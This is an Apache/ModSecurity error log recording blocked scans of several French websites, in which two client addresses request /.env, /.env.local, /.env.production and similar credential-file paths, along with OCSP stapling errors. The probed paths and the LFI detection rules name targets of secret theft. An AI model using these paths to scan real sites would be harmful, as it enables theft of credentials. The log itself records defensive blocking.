[Mon May 11 21:42:26.067657 2026] [security2:error] [pid 1588898:tid 1588919] [client 142.248.80.47:1056] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/api/.env"] [unique_id "agIxIqFW67LJTsgN3jT8NgAAABQ"]
[Mon May 11 21:42:26.068170 2026] [security2:error] [pid 1534836:tid 1534879] [client 142.248.80.47:1030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env.local"] [unique_id "agIxIteaRXe5lR8y0ZOkBAAAAUg"]
[Mon May 11 21:42:26.069305 2026] [security2:error] [pid 1590352:tid 1590406] [client 142.248.80.47:1058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/backend/.env"] [unique_id "agIxIq1q0G_aXAqWauTpaQAAAI4"]
[Mon May 11 21:42:26.069474 2026] [security2:error] [pid 1590352:tid 1590406] [client 142.248.80.47:1058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/backend/.env"] [unique_id "agIxIq1q0G_aXAqWauTpaQAAAI4"]
[Mon May 11 21:42:26.069642 2026] [security2:error] [pid 1590352:tid 1590408] [client 142.248.80.47:65534] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agIxIq1q0G_aXAqWauTpagAAAJA"]
[Mon May 11 21:42:26.081511 2026] [security2:error] [pid 1588898:tid 1588913] [client 142.248.80.47:1036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.env.production"] [unique_id "agIxIqFW67LJTsgN3jT8OAAAAA4"]
[Mon May 11 21:42:26.081669 2026] [security2:error] [pid 1588898:tid 1588913] [client 142.248.80.47:1036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env.production"] [unique_id "agIxIqFW67LJTsgN3jT8OAAAAA4"]
[Mon May 11 21:42:26.083510 2026] [security2:error] [pid 1534836:tid 1534879] [client 142.248.80.47:1030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env.local"] [unique_id "agIxIteaRXe5lR8y0ZOkBAAAAUg"]
[Mon May 11 21:42:26.087197 2026] [security2:error] [pid 1590352:tid 1590408] [client 142.248.80.47:65534] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.env"] [unique_id "agIxIq1q0G_aXAqWauTpagAAAJA"]
[Mon May 11 21:42:28.943499 2026] [security2:error] [pid 1588898:tid 1588913] [client 142.248.80.47:1036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIxIqFW67LJTsgN3jT8OAAAAA4"]
[Mon May 11 21:42:29.029766 2026] [security2:error] [pid 1588898:tid 1588919] [client 142.248.80.47:1056] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIxIqFW67LJTsgN3jT8NgAAABQ"]
[Mon May 11 21:42:29.059705 2026] [security2:error] [pid 1516058:tid 1516110] [client 142.248.80.47:1044] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIxIiMeXtzav-mi9SzD3AAAANQ"]
[Mon May 11 21:42:29.241537 2026] [security2:error] [pid 1534836:tid 1534879] [client 142.248.80.47:1030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIxIteaRXe5lR8y0ZOkBAAAAUg"]
[Mon May 11 21:42:29.275242 2026] [security2:error] [pid 1590352:tid 1590408] [client 142.248.80.47:65534] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIxIq1q0G_aXAqWauTpagAAAJA"]
[Mon May 11 21:42:29.367004 2026] [security2:error] [pid 1590352:tid 1590406] [client 142.248.80.47:1058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIxIq1q0G_aXAqWauTpaQAAAI4"]
[Mon May 11 21:42:38.930750 2026] [security2:error] [pid 1511173:tid 1511199] [client 43.156.156.96:41052] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/promotion.html"] [unique_id "agIxLvjVc-A-CSptvm2EWQAAAFc"]
[Mon May 11 21:42:46.667981 2026] [ssl:error] [pid 1516058:tid 1516093] (EAI 2)Name or service not known: [client 217.113.194.78:16301] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:42:46.668125 2026] [ssl:error] [pid 1516058:tid 1516093] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:54.057430 2026] [ssl:error] [pid 1588898:tid 1588917] (EAI 2)Name or service not known: [client 5.255.118.168:5346] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:54.058552 2026] [ssl:error] [pid 1588898:tid 1588917] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.487868 2026] [ssl:error] [pid 1590352:tid 1590405] (EAI 2)Name or service not known: [client 5.255.118.168:5388] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.488070 2026] [ssl:error] [pid 1590352:tid 1590405] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.499660 2026] [security2:error] [pid 1588898:tid 1588917] [client 5.255.118.168:5346] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/.env"] [unique_id "agIxP6FW67LJTsgN3jT8rgAAABI"]
[Mon May 11 21:42:55.499862 2026] [security2:error] [pid 1588898:tid 1588917] [client 5.255.118.168:5346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/.env"] [unique_id "agIxP6FW67LJTsgN3jT8rgAAABI"]
[Mon May 11 21:42:55.500267 2026] [security2:error] [pid 1588898:tid 1588917] [client 5.255.118.168:5346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIxP6FW67LJTsgN3jT8rgAAABI"]
[Mon May 11 21:42:55.505000 2026] [ssl:error] [pid 1516058:tid 1516092] (EAI 2)Name or service not known: [client 5.255.118.168:5392] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.505292 2026] [ssl:error] [pid 1516058:tid 1516092] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.505692 2026] [ssl:error] [pid 1534836:tid 1534881] (EAI 2)Name or service not known: [client 5.255.118.168:5348] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.505984 2026] [ssl:error] [pid 1534836:tid 1534881] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.550486 2026] [ssl:error] [pid 1588898:tid 1588911] (EAI 2)Name or service not known: [client 5.255.118.168:5374] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.550514 2026] [ssl:error] [pid 1588898:tid 1588911] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.552427 2026] [ssl:error] [pid 1590352:tid 1590400] (EAI 2)Name or service not known: [client 5.255.118.168:5364] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.552452 2026] [ssl:error] [pid 1590352:tid 1590400] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.554692 2026] [ssl:error] [pid 1516058:tid 1516105] (EAI 2)Name or service not known: [client 5.255.118.168:5446] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.554714 2026] [ssl:error] [pid 1516058:tid 1516105] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.555582 2026] [ssl:error] [pid 1511173:tid 1511176] (EAI 2)Name or service not known: [client 5.255.118.168:5420] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.555775 2026] [ssl:error] [pid 1511173:tid 1511176] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.557026 2026] [ssl:error] [pid 1534836:tid 1534885] (EAI 2)Name or service not known: [client 5.255.118.168:5436] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.557046 2026] [ssl:error] [pid 1534836:tid 1534885] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.573286 2026] [ssl:error] [pid 1588898:tid 1588922] (EAI 2)Name or service not known: [client 5.255.118.168:5408] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.573304 2026] [ssl:error] [pid 1588898:tid 1588922] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.778599 2026] [ssl:error] [pid 1511173:tid 1511193] (EAI 2)Name or service not known: [client 5.255.118.168:5458] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 21:42:55.778625 2026] [ssl:error] [pid 1511173:tid 1511193] AH01941: stapling_renew_response: responder error
[Mon May 11 21:42:55.817257 2026] [security2:error] [pid 1588898:tid 1588917] [client 5.255.118.168:5346] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/.env.local"] [unique_id "agIxP6FW67LJTsgN3jT8rwAAABI"]
[Mon May 11 21:42:55.817475 2026] [security2:error] [pid 1588898:tid 1588917] [client 5.255.118.168:5346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/.env.local"] [unique_id "agIxP6FW67LJTsgN3jT8rwAAABI"]
[Mon May 11 21:42:55.817680 2026] [security2:error] [pid 1588898:tid 1588917] [client 5.255.118.168:5346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIxP6FW67LJTsgN3jT8rwAAABI"]
[Mon May 11 21:42:55.936256 2026] [security2:error] [pid 1590352:tid 1590405] [client 5.255.118.168:5388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/app/.env"] [unique_id "agIxP61q0G_aXAqWauTpjwAAAI0"]
[Mon May 11 21:42:55.936492 2026] [security2:error] [pid 1590352:tid 1590405] [client 5.255.118.168:5388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/app/.env"] [unique_id "agIxP61q0G_aXAqWauTpjwAAAI0"]
[Mon May 11 21:42:55.939468 2026] [security2:error] [pid 1590352:tid 1590405] [client 5.255.118.168:5388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIxP61q0G_aXAqWauTpjwAAAI0"]
[Mon May 11 21:42:56.080843 2026] [security2:error] [pid 1516058:tid 1516092] [client 5.255.118.168:5392] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/api/.env"] [unique_id "agIxQCMeXtzav-mi9SzD_wAAAMI"]
[Mon May 11 21:42:56.080875 2026] [security2:error] [pid 1534836:tid 1534881] [client 5.255.118.168:5348] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/.env.production"] [unique_id "agIxQNeaRXe5lR8y0ZOkXgAAAUo"]
[Mon May 11 21:42:56.081086 2026] [security2:error] [pid 1516058:tid 1516092] [client 5.255.118.168:5392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/api/.env"] [unique_id "agIxQCMeXtzav-mi9SzD_wAAAMI"]
[Mon May 11 21:42:56.081097 2026] [security2:error] [pid 1534836:tid 1534881] [client 5.255.118.168:5348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/.env.production"] [unique_id "agIxQNeaRXe5lR8y0ZOkXgAAAUo"]
[Mon May 11 21:42:56.081717 2026] [security2:error] [pid 1534836:tid 1534881] [client 5.255.118.168:5348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIxQNeaRXe5lR8y0ZOkXgAAAUo"]
[Mon May 11 21:42:56.081788 2026] [security2:error] [pid 1516058:tid 1516092] [client 5.255.118.168:5392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIxQCMeXtzav-mi9SzD_wAAAMI"]
[Mon May 11 21:42:56.097758 2026] [security2:error] [pid 1590352:tid 1590400] [client 5.255.118.168:5364] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/backend/.env"] [unique_id "agIxQK1q0G_aXAqWauTpkAAAAIg"]
[Mon May 11 21:42:56.097957 2026] [security2:error] [pid 1590352:tid 1590400] [client 5.255.118.168:5364] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/backend/.env"] [unique_id "agIxQK1q0G_aXAqWauTpkAAAAIg"]
[Mon May 11 21:42:56.098443 2026] [security2:error] [pid 1590352:tid 1590400] [client 5.255.118.168:5364] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.boxparentbebe.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIxQK1q0G_aXAqWauTpkAAAAIg"]
